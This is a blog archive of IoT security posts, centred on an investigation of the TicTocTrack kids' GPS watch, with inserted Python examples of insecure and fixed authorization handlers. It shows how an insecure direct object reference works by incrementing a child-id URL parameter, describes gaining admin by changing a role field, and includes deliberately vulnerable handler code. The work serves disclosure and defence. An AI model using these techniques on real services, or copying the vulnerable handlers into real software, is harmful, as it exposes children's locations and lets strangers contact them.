Category Archives: IoT

Microsoft acquires Express Logic, accelerating IoT development for billions of devices at scale

IoT sensors are being infused into just about everything, from industrial equipment to consumer devices, and increasingly these devices are connecting to the cloud. By 2020, Gartner predicts there will be more than 20 billion connected devices. In April 2018, we announced we’re investing $5 billion in IoT and the intelligent edge over the next four years. Since then, we’ve been making a number of investments from product innovation – including Azure Sphere, Azure Digital Twins, Azure IoT Edge, Azure Maps and Azure IoT Central – new partnerships with DJI, SAP, PTC, Qualcomm and Carnegie Mellon University for IoT and edge app development, and programs to help drive the next wave of innovation for our customers.

Today, I am incredibly excited to share we have acquired Express Logic, a leader in real time operating systems (RTOS) for IoT and edge devices powered by microcontroller units (MCUs). Express Logic’s ThreadX RTOS has over 6.2 billion deployments, making it one of the most deployed RTOS in the world. This widespread popularity is driven by demand for technology to support resource constrained environments, especially those that require safety and security. Manufacturers building products across a range of categories – from low capacity sensors like lightbulbs and temperature gauges to air conditioners, medical devices, and network appliances – leverage the size, safety and security benefits of Express Logic solutions to achieve faster time to market. Even highly constrained devices (battery powered and having less than 64KB of flash memory) can use Express Logic solutions. Over 9 billion of these MCU-powered devices are built and deployed globally every year, many of which can benefit from Express Logic solutions.

With this acquisition, we will unlock access to billions of new connected endpoints, grow the number of devices that can seamlessly connect to Azure and enable new intelligent capabilities. Express Logic’s ThreadX RTOS joins Microsoft’s growing support for IoT devices and is complementary with Azure Sphere, our premier security offering in the microcontroller space. Our goal is to make Express Logic’s ThreadX RTOS available as an option for real time processing requirements on an Azure Sphere device and also enable ThreadX-powered devices to connect to Azure IoT Edge devices when the IoT solution calls for edge computing capabilities. While we recommend Azure Sphere for customers’ most secured connections to the cloud, where Azure Sphere isn’t possible in highly constrained devices, we recommend Express Logic’s ThreadX RTOS over other RTOS options in the industry because of its additional certifications and out-of-the-box connectivity to Azure IoT Hub.

As we’ve stated consistently in the past, our primary goal is to simplify IoT – from the cloud all the way down to the smallest MCU based devices. We do this by meeting our customers where they are with the right developer tools, software and intelligent cloud services to manage their solutions at scale. Express Logic’s technology and team will be an incredible addition to Microsoft in our quest to give every customer the ability to transform their businesses, and the world at large, with connected solutions.

Can Smart Lighting Beat a Hacker? How Machine Learning Can Boost IoT Security

It’s possible: Smart lighting could be the most dangerous element in your company’s network. By 2025, there will be 75 million IoT devices in use. Smart devices are now found throughout most commercial offices, yet a lack of security could make them ticking time bombs;...

The post Can Smart Lighting Beat a Hacker? How Machine Learning Can Boost IoT Security appeared first on Lastline.

The post Can Smart Lighting Beat a Hacker? How Machine Learning Can Boost IoT Security appeared first on Security Boulevard.

What Did We Learn from the Global GPS Collapse?

On April 6, 2019, a ten-bit counter rolled over. The counter, a component of many older satellites, marks the weeks since Jan 1, 1980. It rolled over once before, in the fall of 1999. That event was inconsequential because few complex systems relied on GPS. Now, more systems rely on accurate time and position data: automated container loading and unloading systems at ports, for example. The issue was not with the satellites or with the cranes.

The problem highlights the pervasive disconnect between the worlds of IT and OT. Satellites are a form of industrial control system. Engineers follow the same set of principles designing satellites as they do designing any other complex programmable machine. Safety first, service availability next.

In the 1990s satellites suffered a series of failures, prompting the US General Accounting Office (GAO) to review satellite security. The report (at https://www.gao.gov/products/GAO-02-781) identifies two classes of problems that might befall satellites, shown in these two figures.

Figure 1: Unintentional Threats to Satellites

Figure 2: Intentional Threats to Satellites

This analysis is incomplete. It omits an entire class of problems: software design defects and code bugs. The decision to use a 10-bit counter to track the passing weeks is a design defect. The useful life of a satellite can be 40 years or more. A 10-bit counter runs from 0 to 1,023, then rolls over to zero. Since there are 52 weeks in a year, the counter does not quite make it to 20 years. This design specification was dramatically under-sized. More recent designs use a 13-bit counter, which will not roll over for almost 160 years. That provides an adequate margin.

As for code bugs, satellites suffer them just like any other programmable system. The Socrates network tracks satellites to project potential collisions. In 2009, Socrates predicted that two satellites, a defunct Soviet-era communications satellite and the Iridium constellation satellite #33, were projected to pass 564 meters apart. In reality, they collided, creating over 2,000 pieces of debris larger than 1 cm in size. Whether the defect arose from buggy code or inadequate precision in observations, the satellites collided. Either way, there is a software defect here. The question is, is the software inaccurate, or is it creating precision that does not exist? If the instruments doing the measurement have a margin of error, the report should include that data. By stating that the satellites will pass 564 meters apart, the value implies a precision of ½ meter either way – between 563.5 meters and 564.5 meters. If the precision is within half a kilometer, the software should state that specifically – “Possible collision – distance between objects under 1 KM.” If the input data is precise, then the code is calculating the trajectories incorrectly. Either is a code bug.

These two types of defects are neither unintentional (code and designs do not degrade over time) nor intentional (no saboteur planted the defect). The third class of defect results from inconsistent design specifications (the satellite can live for 40 years but the counter rolls over in 20) or poor coding practices (creating a level of precision unsupported by the measurements, or calculating the trajectories incorrectly). These are software defects.
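To make the counter-width argument concrete, here is an added example (not from the original post or from any GPS vendor) that models what a `bits`-wide week counter actually transmits, when it wraps, and the two ways a receiver can interpret the wrapped value. It uses the GPS standard epoch of Sunday 6 January 1980 as week 0; the `decode_with_reference` strategy, which resolves the ambiguity against a date the device knows cannot be in the past (for example its firmware build date), is a common mitigation and is labelled here as the example's own assumption rather than any particular product's implementation.

```python
from datetime import date, timedelta

# Added example: models a truncated GPS week counter. Not code from the post.
GPS_EPOCH = date(1980, 1, 6)   # Sunday that starts GPS week 0 (standard epoch)
WEEK = timedelta(weeks=1)


def full_week_for(d: date) -> int:
    """Weeks elapsed since the epoch, with no truncation."""
    return (d - GPS_EPOCH).days // 7


def truncated_week(full_week: int, bits: int) -> int:
    """What a `bits`-wide counter can actually carry: the week number modulo 2**bits."""
    return full_week % (1 << bits)


def rollover_dates(bits: int, count: int) -> list:
    """Sundays on which a `bits`-wide counter wraps back to zero."""
    period = 1 << bits
    return [GPS_EPOCH + WEEK * (period * k) for k in range(1, count + 1)]


def naive_decode(week_field: int) -> date:
    """The defect: treat the transmitted field as if it were the full week count."""
    return GPS_EPOCH + WEEK * week_field


def decode_with_reference(week_field: int, bits: int, reference: date) -> date:
    """Assumed mitigation: pick the cycle so the result is not earlier than `reference`
    (e.g. the firmware build date). Correct only while the device is younger than one cycle."""
    period = 1 << bits
    ref_week = full_week_for(reference)
    cycle_start = ref_week - (ref_week % period)
    candidate = cycle_start + week_field
    if candidate < ref_week:          # field already wrapped within this cycle
        candidate += period
    return GPS_EPOCH + WEEK * candidate


if __name__ == "__main__":
    print("10-bit rollovers:", rollover_dates(10, 2))    # 1999-08-22, 2019-04-07
    print("13-bit first rollover:", rollover_dates(13, 1))
    field = truncated_week(full_week_for(date(2019, 4, 7)), 10)   # transmitted as 0
    print("naive:", naive_decode(field))
    print("1998-era firmware:", decode_with_reference(field, 10, date(1998, 1, 1)))
    print("2019-era firmware:", decode_with_reference(field, 10, date(2019, 1, 1)))
```

Running it shows both halves of the argument: the 10-bit counter wraps on 22 August 1999 and 7 April 2019, the 13-bit counter not until 2137, and a receiver whose reference date predates the 1999 rollover decodes the April 2019 broadcast as August 1999, which is exactly the failure mode a forty-year service life has to survive.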

As we all know, there was no failure in the GPS system. I made a passing comment during a talk on satellite security at the RSA 2019 conference. A reporter from Tom’s Guide was there, and he wrote an excellent article on the problem: https://www.tomsguide.com/us/gps-mini-y2k-rsa2019,news-29583.html.

The failure is not including software issues among the risks to a programmable device.

What do you think? Let me know below or @WilliamMalikTM.


Radware Blog: Bot Managers Are a Cash-Back Program For Your Company

In my previous blog, I briefly discussed what bot managers are and why they are needed. Today, we will conduct a short ROI exercise (perhaps the toughest task in information security!). To recap: Bots generate a little over half of today’s internet traffic. Roughly half of that half (i.e. a quarter, for rusty ones like […]

The post Bot Managers Are a Cash-Back Program For Your Company appeared first on Radware Blog.

How to Track Your Kids (and Other People’s Kids) With the TicTocTrack Watch



Do you ever hear those stories from your parents along the lines of "when I was young..." and then there's a tale of how risky life was back then compared to today. You know, stuff like having to walk themselves to school without adult supervision, crazy stuff like that which we somehow seem to worry much more about today than we did then. Never mind that far fewer kids go missing today than 20 years ago and there's much less chance of them being hit by a car; circumstances are such today that parents are more paranoid than ever.

The solution? Track your kids' movements, which brings us to TicTocTrack. The best way to understand their value proposition is via this news piece from a few years ago:

Irrespective of what I now know about the product and what you're about to read here, this sets off alarm bells for me. I've been involved with a bunch of really poorly implemented "Internet of Things" things in the past that presented serious privacy risks to those who used them. For example, there was VTech back in 2015 who leaked millions of kids' info after they registered with "smart" tablets. Then there was CloudPets leaking kids voices because the "smart" teddy bears that recorded them (yep, that's right) then stored those recordings in a publicly facing database with no password. Not to mention the various spyware apps often installed on kids' phones to track them which then subsequently leak their data all over the internet. mSpy leaked data. SpyFone leaked data. Mobiispy leaked data. And that's just a small slice of them.

And then there's kids' smart watches themselves. A couple of years back, the Norwegian Consumer Council discovered a whole raft of security flaws in a number of them which covered products from Gator, GPS for barn and Xplora:


These flaws included the ability for "a stranger [to] take control of the watch and track, eavesdrop on and communicate with the child" and "make it look like the child is somewhere it is not". These issues (among others), led the council's Director of Digital Policy to conclude that:

These watches have no place on a shop’s shelf, let alone on a child’s wrist.

Referencing that report, US Consumer groups drew a similar conclusion:

US consumer groups are now warning parents not to buy the devices

The manufacturers fixed the identified flaws... kind of. Two months later, critical security flaws still remained in some of the watches tested, the most egregious of which was with Gator's product:

Adding to the severity of the issues, Gator Norge gave the customers of the Gator2 watches a new Gator3 watch as compensation. The Gator3 watch turned out to have even more serious security flaws, storing parents and kids’ voice messages on an openly available webserver.

Around a similar time, Germany outright banned this class of watch. The by-line in that piece says it all:

German parents are being told to destroy smartwatches they have bought for their children after the country's telecoms regulator put a blanket ban in place to prevent sale of the devices, amid growing privacy concerns.

Wow - destroy them! The story goes on to refer to the German Federal Network Agency's rationale which includes the fact that "parents can use such children’s watches to listen unnoticed to the child’s environment". This is a really important "feature" to understand: these devices aren't just about tracking the kids' whereabouts, they're also designed to listen to their surroundings... including their voices. Now on the one hand you might say "well, parents have a right to do that". Maybe so, maybe not, you'll hear vehement arguments on that both ways. But what if a stranger had that ability - how would you feel about that? We'll come back to that later.

Around a year later, Pen Test Partners in the UK found more security bugs. Really bad ones:

Guess what: a train wreck. Anyone could access the entire database, including real time child location, name, parents details etc.

This wasn't just bad in terms of the nature of the exposed data, it was also bad in terms of the ease with which it was accessed:

User[Grade] stands out in there. I changed the value to 2 and nothing happened, BUT change it to 0 and you get platform admin.

So change a number in the request and you become God. This is something which is easily discovered in minutes either by a legitimate tester within the organisation building the software (which obviously didn't happen) or... by someone with malicious intent. The Pen Test Partners piece concludes:

We keep seeing issues on cheap Chinese GPS watches, ranging from simple Insecure Direct Object Request (IDOR), to this even simpler full platform take over with a simple request parameter change.

Keep that exploit in mind - insecure direct object references are as simple as taking a URL like this:

example.com/get-kids-location?kid-id=27

And changing it to this:

example.com/get-kids-location?kid-id=28

The level of sophistication required to exploit an IDOR vulnerability boils down to being able to count. That was in January this year; fast forward a few months and Ken Munro from Pen Test Partners contacts me. He's found more serious vulnerabilities with the services these devices use and in particular, with TicTocTrack's product. He believes the same insecure direct object reference issues are plaguing the Aussie service and they need someone on the ground here to help establish the legitimacy of the findings.
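To show what the two findings quoted above look like in code, and what the fix is, here is an added example that is not TicTocTrack's, Gator's or Pen Test Partners' code. It is a hypothetical in-memory version of a "get kids location" service: the vulnerable handlers check only that the caller is logged in (the `kid-id=27` to `kid-id=28` problem) and copy every submitted profile field, including a role (the `User[Grade]` problem); the fixed handlers route every read and write through one ownership check and apply only an allow-list of user-editable fields. All names, ids and coordinates are constructed for the example.

```python
import logging
from dataclasses import dataclass

# Added example: hypothetical handlers, not the real service. Sample data is constructed.
log = logging.getLogger("authz")


class NotFound(Exception):
    """Raised for both 'no such id' and 'not yours', so the response does not reveal which."""


@dataclass
class Child:
    kid_id: int
    name: str
    parent_id: int      # owner account; set server-side, never taken from the request
    location: tuple     # (lat, lon); constructed sample values


# Constructed records: account 1 owns kid 27, account 2 owns kid 28.
CHILDREN = {
    27: Child(27, "Elle", parent_id=1, location=(-28.0, 153.4)),
    28: Child(28, "Sam", parent_id=2, location=(-27.5, 153.0)),
}
# Role stored server-side; 0 is platform admin, mirroring the Gator "User[Grade]" finding.
USERS = {1: {"grade": 2}, 2: {"grade": 2}}


# --- Vulnerable: authenticated, but never authorised ---------------------------

def get_location_vulnerable(session_user: int, kid_id: int) -> tuple:
    # Any logged-in account can read any child: just change the number in the request.
    return CHILDREN[kid_id].location


def update_user_vulnerable(session_user: int, form: dict) -> dict:
    # Copies every submitted field, so a client-supplied grade=0 becomes admin.
    USERS[session_user].update(form)
    return USERS[session_user]


# --- Fixed: one ownership chokepoint, allow-listed writes ----------------------

def _owned_child(session_user: int, kid_id: int) -> Child:
    """Every read or write of a child goes through here; denials are logged for detection."""
    child = CHILDREN.get(kid_id)
    if child is None or child.parent_id != session_user:
        log.warning("authz denied user=%s kid_id=%s", session_user, kid_id)
        raise NotFound(kid_id)
    return child


def get_location_fixed(session_user: int, kid_id: int) -> tuple:
    return _owned_child(session_user, kid_id).location


def set_location_fixed(session_user: int, kid_id: int, location: tuple) -> tuple:
    # Writes use the same check, so nobody can "relocate" someone else's child.
    child = _owned_child(session_user, kid_id)
    child.location = location
    return child.location


USER_EDITABLE = {"display_name", "phone"}   # fields a user may change about themselves


def update_user_fixed(session_user: int, form: dict) -> dict:
    # Server-owned fields such as "grade" are silently dropped from the submitted form.
    USERS[session_user].update({k: v for k, v in form.items() if k in USER_EDITABLE})
    return USERS[session_user]


def denied(handler, *args) -> bool:
    """True if the handler refuses the request; used to demonstrate the fixed paths."""
    try:
        handler(*args)
        return False
    except NotFound:
        return True
```

The design point is that the check lives in one place and is keyed on the session identity plus the record's stored owner, never on anything the client sends; a second handler that forgets to call it is then the only way to reintroduce the bug, which is easy to grep for in review.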

To test Pen Test Partners' theory, I decided to play your typical parent in terms of the buying and setup process and use my 6-year old daughter, Elle, as the typical child. She's smack bang in the demographic of who the watch is designed for and I was happy to give Ken access to her movements for the purposes of his research. So it's off to tictoctrack.com.au where the site leans on its Aussie origins:


I can understand why companies emphasise the "we host your data near you" mantra, but in practical terms it makes no difference whether it's in Australia or, say, the US. You're also often talking about services that are written and / or managed by offshore companies anyway so where the data physically sits really is inconsequential (note: this is assuming no regulatory obligations around co-locating data in the country of origin). The "we take the security of your data seriously" bit, however, always worries me and as you'll see shortly, that concern is warranted.

The Aussie angle comes up again further down the page too:


At this point it's probably worthwhile pointing out that despite the Aussieness asserted on the front page, the origin of the watch isn't exactly very Australian. In fact, the watch should be rather familiar by now:


So for all the talk of TicTocTrack, the hardware itself is actually Gator. In fact, you can see exactly the same devices over on the Gator website:


It's not clear how they arrived at the conclusion of "the world's most reputable GPS watch for kids and elders", especially given the earlier findings. And who is Gator? They're a Chinese company located in Shenzhen:


The country of origin would be largely inconsequential were it not for TicTocTrack's insistence on playing the Aussie card earlier on. It's also relevant in light of the embedded media piece at the start of this blog post: this isn't "a new device developed by a Brisbane mother" nor is the mother "the creator of the watch". In fairness to Karen Cantwell, it wasn't her making those claims in the story and the media does have a way of spinning things, but it's important to be clear about this given how this story unfolds from here.

Regardless, let's proceed and actually buy the thing. I get Elle involved and allow her to choose the colour, with rather predictable results:


The terms and conditions were actually pretty light (kudos for that!) but the link to the privacy and security policies was dead. I go through the checkout process and buy the watch:


iStaySafe Pty Ltd is the parent company and we'll see that name pop up again later on. An email promptly arrives with a receipt and a notice about the order being processed, albeit without a delivery time frame mentioned. With time to kill, I decide to poke around and take a look at how the tracking works, starting with the link below:


Turns out the tracking app is a totally different website running on a totally different hosting provider in a totally different state:


The primary site is down in Melbourne whilst the tracking site is in Brisbane per the info on the front page. My credentials from the primary site don't work there and registering results in me needing to choose a reseller:


Here we see iStaySafe again, but it's the other resellers (all Aussie companies) that help put the whole Gator situation in context. Uniting Agewell provides services to the elderly and when considering the nature of the Gator watch, it made me think back to a comment on the Chinese manufacturer's website: "the world's most reputable GPS watch for kids and elders". Cellnet is a publicly listed company with a heap of different brands. Wearco produces "mining consumables". eHomeCare provides "smart care technology for healthy ageing" and their product page on the GPS tracking watch explains the relationship:


As it turns out, attempting to sign up just boots me back to the TicTocTrack website so I assume I just need to wait for the watch to arrive before going any further. Still, this has been a useful exercise to understand not just how the various entities relate to each other, but also because it shows that the scope of this issue isn't just constrained to kids, it affects the elderly too.

A few days later, this lands in the mail:


I'm surprised by how chunky it is - this is a big unit! For context, here it is next to my series 4 Apple Watch (44mm - the big one):


I'm not exactly expecting Apple build quality here (and as you can see from the pic, it's a long way from that), but this is a lot to put on a little kid's wrist. You can see the access port for the physical SIM card (more on that later), as opposed to Apple's eSIM implementation so it's obviously going to consume a bunch of space when you're building a physical caddy into the design to hold a chip on a card.

Regardless, let's get on with the setup process and I'm going to be your average everyday parent and just follow the instructions:


The app is branded TicTocTrack and is published by iStaySafe:


Popping it open, the first step is registration (the mobile number is a pre-filled placeholder):


I'm surprised by the empty space at the top and the bottom - just which generation of iPhone was this designed for? Certainly not the current gen XS; does that resolution put it back in about the iPhone 5 era from 2012? That'd be iOS 6 days, which their user manual seems to suggest:


Whilst the aesthetics of the app might seem inconsequential, I've always found that it's a good indicator of overall quality and is often accompanied by shortcomings of a more serious nature. It's the little things that keep popping up, for example the language and grammar in the aforementioned user manual. Why is it "Support Platforms" and then "Supported devices"? And why is the opening sentence of the doc so... odd?

Welcome to TicTocTrack® User Manual! You are about to begin your journey with the live tracking with your family.

That sort of language appears every now and then, for example in the password reset section:

If you forget your password, please use web portal to obtain new password.

It has me wondering how much of this was outsourced overseas and again, that wouldn't normally be worth mentioning were it not for the emphasis placed on the Aussie origins of the service (I know, despite it being a Chinese watch). The actual origins of the service become clear once you look at the download links for the app:


Searching for that same "Nibaya" name on the TicTocTrack website turns up several different versions of the user manual:


It turns out that Nibaya is a Sri Lankan software development company with a focus on quality control and quality assurance:


We're also told by the browser that they're "Not secure" which is not a great look in this day and age. They do in fact have a certificate on the site, only thing is it expired two and a half years ago and they haven't bothered to renew it:


Moving on, there's a mobile phone number verification process which sends an SMS to my device:


Only thing is, the keyboard defaults back to purely alphabetical after every character is typed so unless you pre-fill the field from the SMS (which iOS natively allows you to do), it's a bit painful. Again, it's all the little things.

Following successful number verification, the app fires up and asks for access to location data:


Based on what I'd already read in the user manual, my location data can be used to direct me to a child wearing the watch so requesting this seems fine for that feature to function correctly.

Next is the money side of things and we're looking at $20 a month for the "Full Service Subscription":


If I'm honest, I'm still a bit confused about what this entails. Is this for the tracking service? Or for the Telstra SIM which it shipped with and is identically priced?


Or is it for both? I'm assuming both but then when I look at the service plans on the website, none of them are priced at $19.99. Regardless, I take the $20 option and move on:


The adding a device bit I get - I'm going to need to pair the watch - but the subscription bit further confuses me because I've literally just bought a subscription on the previous screen! For my purposes I don't see myself needing it for any more than 7 days anyway so I'm not too concerned, let's go and add that new device:


A new TicTocTrack watch it is:


And let's go with the supplied SIM which then leads us to the device and SIM registration page:


The IMEI is the identifier of the device itself (the watch) and that can be scanned off the barcode in the packaging. The SIM ID relates to the pre-packaged SIM from Telstra, the barcode for which is under one of the grey obfuscation boxes in the earlier image. I call the device "Elle", register it and that's that.

Lastly, I insert the SIM into the watch (the metal flap for which opens in the opposite direction to the video tutorial and took me a good 5 minutes to work out for fear of breaking it), then drop it onto the power. Give it a couple of hours to charge, boot it up and shortly afterwards it's showing a 3G connection:


I give it a little time to sync to the TicTocTrack service then successfully find it in the app:


Drilling down on Elle's profile, I get an address and GPS coordinates which are both pretty accurate:


To its credit, the watch does a pretty good job of the setup and tracking process once you're past some of the earlier hurdles. At this stage, I now have a device which is broadcasting its location reliably and I can successfully see it in the app. I'm not going to go through other features such as the ability to send an SOS or make a call, at this stage all I really care about is that the watch is now tracking her movements.

The next day, we head off to tennis camp (it's school holiday time) with the TicTocTrack / Gator on her wrist:


She isn't aware of why she has the watch, to her it's just a new cool thing she gets to wear. And it's pink so that's all boxes ticked. She's now at the local court whilst I (in my helicopter parent mode), am sitting at home watching her location on my device:


Safe in the knowledge that my little girl is in a place that I trust, I get back to work. But someone else is also watching her location, someone on the other side of the world who is now able to track her every move - it's Ken. Not only is Ken watching, as far as TicTocTrack is concerned he's just taken her away:


She's no longer playing tennis, she's now in the water somewhere off Wavebreak island. This isn't a GPS glitch; Ken has placed her four and a half kilometres away by exploiting an insecure direct object reference vulnerability in TicTocTrack's API. He's done this with my consent and only to my child, but you can see how this could easily be abused. It's not just the concept of making someone's child appear in a different location to what the parents expect, you could also have them appear exactly where the parents expect... when they're actually nowhere near there.

But these devices are about much more than just location tracking, they also enable 2-way voice communications just as you'd have on a more traditional cellular phone. This, in turn, introduces a far creepier risk - that unknown parties may be able to talk to your kids. In order to demonstrate this, I put the watch back on Elle and gave Pen Test Partners permission to contact her. Pay attention to how much interaction is required on her part in order for a stranger to begin talking to her simply by exploiting a vulnerability in the TicTocTrack service:

Even for me, that video is creepy. It required zero interaction because Vangelis was able to add himself as a parent and a parent can call the device and have it automatically answer without interaction by the child. The watch actually says "Dad" next to a little image of a male avatar so a kid would think it was their father calling them:


This is precisely what the Germans were worried about when they banned the watches outright and when you watch that video, it seems like a pretty good move on their part.

The exploits go well beyond what I've already covered here too, for example:


That link goes off to a Facebook post by an account called Travelling with Kids which very enthusiastically espouses the virtues of tracking them (it's not explicitly said, but the post appears to be promotional in nature):

The little wanderers were stoked to be going off to kids club at the Hard Rock Hotel Bali We have complete peace of mind knowing they’re wearing their TicTocTrack watches, so they can call us at anytime and with GeoFencing we know their location

By now, I'm sure you can see the irony in the "peace of mind" statement.

The technical flaws go much further than this but rather than covering them here, have a read of the Pen Test Partners write-up which includes details of the IDOR vulnerability. Just to put it in layman's terms, here's the discussion I had with Vangelis about it:


Being conscious that many people who don't normally travel in information security circles will read this, handling a vulnerability of this nature in a responsible fashion is enormously important. Obviously you want to remove the risk ASAP, but you also want to make sure that information about how to exploit it isn't made public beforehand. We religiously followed established best practices for responsible disclosure, here's the timeline with dates being local Aussie ones for me:

  1. Saturday 6 April: Ken first contacts me about the watch. I order one that morning.
  2. Tuesday 9 April: Watch arrives.
  3. Wednesday 10 April: I set the account up.
  4. Thursday 11 April: Elle wears the watch to tennis and we test "relocating" her.
  5. Friday 12 April: Vangelis calls her and has the discussion in the video above. Ken privately discloses the vulnerability to TicTocTrack support that night.
  6. Monday 15 April (today): TicTocTrack takes the service offline.

A couple of hours before publishing, I received a notification to the email address I signed up with as follows:


I'm in two minds about this message: on the one hand, they took the service down as fast as we could reasonably expect, being within a single business day, so kudos to them on that. On the other hand, the messaging worries me in a number of ways:

Firstly, Ken didn't just "allege" that there were security flaws, he spelled it out. His precise wording was "The service fails to correctly verify that a user is authorised to access data, meaning that anyone can access any data, should they so wish". Anyone testing for a flaw of this nature would very quickly establish that changing a number in the request would hand over control of someone else's account thus proving the vulnerability beyond any shadow of a doubt. That word was used 3 times in the statement and it implies that they're unsubstantiated claims; they're clearly not. Which brings me to the next point:

Secondly, it wouldn't make sense to pull down the entire service if you weren't convinced there was a serious vulnerability. Many people allege there are security flaws in services, but those services don't generally go offline until the flaws are proven. Clearly an incident like this has a bunch of downstream impact and acknowledging it publicly is not something you do on a whim. Either TicTocTrack was very confident in the accuracy of Ken's report (well beyond what "alleged" implies) or there were other factors I'm not aware of that drove them to rapidly pull the service.

Thirdly, the following statement was made without citing any evidence: "there has never been a security breach that has led to our customer's personal data being used for malicious purposes". It's not uncommon to see a response like this following a security incident, but what it should read is "we don't know if there's ever been a security breach..." This vulnerability relied on an authenticated user with a legitimate account modifying a number in the request, and the likelihood of that being logged in a fashion sufficient to establish it ever happened is extremely low. And if you were the kind of developers to log this sort of information, you'd also be the kind not to have the vulnerability in the first place!
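The flaw Ken described (a lookup by whatever id arrives in the request, with no check that the record belongs to the caller) and the logging point above can both be shown in a few lines. The following is an added example written for this page, not TicTocTrack's or Nabaya's code: the account names, the record layout and the `get_location_*` functions are all constructed for illustration. The vulnerable handler authenticates the caller and then trusts the device id; the hardened one ties the record to the session user and writes every denial to an audit log, which is exactly the evidence a "never been a breach" statement would need.

```python
# Added example (constructed; not TicTocTrack's or Nabaya's code): an
# insecure-direct-object-reference handler beside its hardened form.
from typing import Optional

# Constructed sample data: two parent accounts, each owning one child's watch.
ACCOUNTS = {"parent_a", "parent_b"}
DEVICES = {
    101: {"owner": "parent_a", "child": "child A", "lat": -27.47, "lon": 153.03},
    102: {"owner": "parent_b", "child": "child B", "lat": -33.87, "lon": 151.21},
}

# Stand-in for the service's audit log; a real service writes this to its log pipeline.
AUDIT_LOG: list = []


def get_location_vulnerable(session_user: str, device_id: int) -> Optional[dict]:
    """Authenticates the caller, then returns whatever record device_id names.
    Nothing ties device_id to session_user, so adding 1 to the id reads
    another family's data. (Deliberately insecure: the 'before' form.)"""
    if session_user not in ACCOUNTS:
        return None
    record = DEVICES.get(device_id)
    if record is None:
        return None
    return {"lat": record["lat"], "lon": record["lon"]}


def get_location_hardened(session_user: str, device_id: int) -> Optional[dict]:
    """Same lookup, plus an ownership check. A record that exists but belongs to
    someone else is treated exactly like a record that does not exist, so the
    response cannot be used to enumerate valid ids, and the denial is logged."""
    if session_user not in ACCOUNTS:
        AUDIT_LOG.append(f"DENY user={session_user!r} device={device_id} reason=unauthenticated")
        return None
    record = DEVICES.get(device_id)
    if record is None or record["owner"] != session_user:
        AUDIT_LOG.append(f"DENY user={session_user!r} device={device_id} reason=not_owner")
        return None
    return {"lat": record["lat"], "lon": record["lon"]}


def denied_requests(user: str) -> list:
    """Audit entries for one user: the evidence needed to say whether someone
    ever tried to step through ids that were not theirs."""
    return [line for line in AUDIT_LOG if f"user={user!r}" in line]


if __name__ == "__main__":
    # parent_a asks for parent_b's watch (device 102).
    print("vulnerable:", get_location_vulnerable("parent_a", 102))  # leaks child B's position
    print("hardened:  ", get_location_hardened("parent_a", 102))    # None
    print("own device:", get_location_hardened("parent_a", 101))
    print("audit:", denied_requests("parent_a"))
```

The same shape applies to every endpoint that takes an object id: scope the lookup to the authenticated principal, return the same "not found" result for foreign and non-existent ids, and keep the denial log long enough to answer the question the vendor's statement dodged.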

Let's be perfectly clear - this is just one more incident in a series of similar ones impacting kids tracking watches and Gator in particular. What's infuriating about this situation is that not only do these egregiously obvious security flaws keep occurring, they're just not being taken seriously enough by the manufacturers and distributors when they do occur. There's no finer illustration of this than the statement Ken got when speaking to an agent over in his corner of the world:

UK agent for Gator said that they didn’t have the money for security, as otherwise they couldn’t afford a staff Xmas party

Is that really where we're at? Tossing up between exposing our kids in this fashion and beers at Christmas? If you're a parent ever considering buying one of these for your kid, just remember that quote. Inevitably, cost would have also been a major driver for TicTocTrack outsourcing their development to Sri Lanka, indeed it's something that Nabaya prides itself on:

[screenshot of the Nabaya website; image not reproduced in this copy]

I want to finish on a broader note than just TicTocTrack or Gator or even smart watches in general; a huge number of both the devices and services I see being marketed either directly at kids or at parents to monitor their kids are absolute garbage in terms of the effort invested in security and privacy. I mentioned CloudPets and VTech earlier on and I also mentioned spyware apps; by design, every one of these has access to data that most parents would consider very personal and, in many cases, (such as the photos older kids are often taking), very sensitive. These products are simply not designed with a security-orientated mindset and the development is often outsourced to cheap markets that build software on a shoestring. The sorts of flaws we're seeing perfectly illustrate that: CloudPets simply didn't have a password on their database and both the VTech and TicTocTrack vulnerabilities were as easy as just incrementing a number in a web request. A bunch of the spyware breaches I referred to occurred because the developers literally published all the collected data to the internet for the world to see. How much testing do you think actually went on in these cases? Did nobody even just try adding 1 to a number in the request? Because that's all Ken needed to do; Ken can count therefore Ken can hack a device tracking children. Maybe I should give Elle a go at that, her counting is coming along quite nicely...

There's only one way I'd track my kids with GPS and cellular and that's with an Apple Watch. I don't mean to make that sound trivial either because we're talking about a $549 outlay here which is a hell of a lot to spend on a kid's watch (plus you still need a companion iPhone), but Apple is the sort of organisation that not only puts privacy first, but makes sure they actually pay attention to their security posture too. As that Gator agent in the UK well knows, security costs money and if you want that as a consumer, you're going to need to pay for it.

I'll leave you with this thread I wrote up when first starting to look at the watch. It got a lot of traction and I'd like to encourage you to share it with your parenting friends on Twitter or via the one I also posted to Facebook.

Vulnerabilities in smart IP cameras expose users to privacy, security risks

Bitdefender has found new vulnerabilities in IoT cameras that are meant to be protecting people’s homes. The global smart camera market is predicted to grow at a CAGR of 8

The post Vulnerabilities in smart IP cameras expose users to privacy, security risks appeared first on The Cyber Security Place.

4 ways to minimize IoT cybersecurity risk

Few technology trends are growing as quickly as the internet of things. According to Bain & Company, the markets for IoT hardware, software, systems integration, data and telecom services will grow

The post 4 ways to minimize IoT cybersecurity risk appeared first on The Cyber Security Place.

The Ethical Hacker Network: Hardware Hacking 101 – Lesson 3: Abusing UART (U Are RooT)

As a reminder, Lesson 1 was a primer on electronics and setting up your lab, and Lesson 2 was an introduction to classical hardware hacking. To get started with security-focused hardware hacking, let's look at a pretty simple example: getting a root shell by breaking into U-Boot via a serial console. Basically, we're just going to connect to a serial port, change a boot flag, and get a shell. Sounds simple, right? To some extent, it is! The only real hard parts are finding the serial port, determining the pinout, and determining the timing. No problem, right? By the end of this lesson, you’ll be abusing UART with the best of them.

The unassuming target of this lesson is a Synology RT2600ac wireless router. This is one of the devices that the ISE Labs team assessed as part of our SOHO 2.0 project, but we had a bit of a problem. We had used the device but failed to record the credentials. And the reset button? Broken. This is where getting a hardware shell came in handy. By using a UART to get a shell, I was able to reset the password and get the assessment back on track. Hardware shells allow you to do so much more though, both in the context of repair and in the context of security. It’s a root shell; you can usually do whatever you like.

The post Hardware Hacking 101 – Lesson 3: Abusing UART (U Are RooT) appeared first on The Ethical Hacker Network.

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

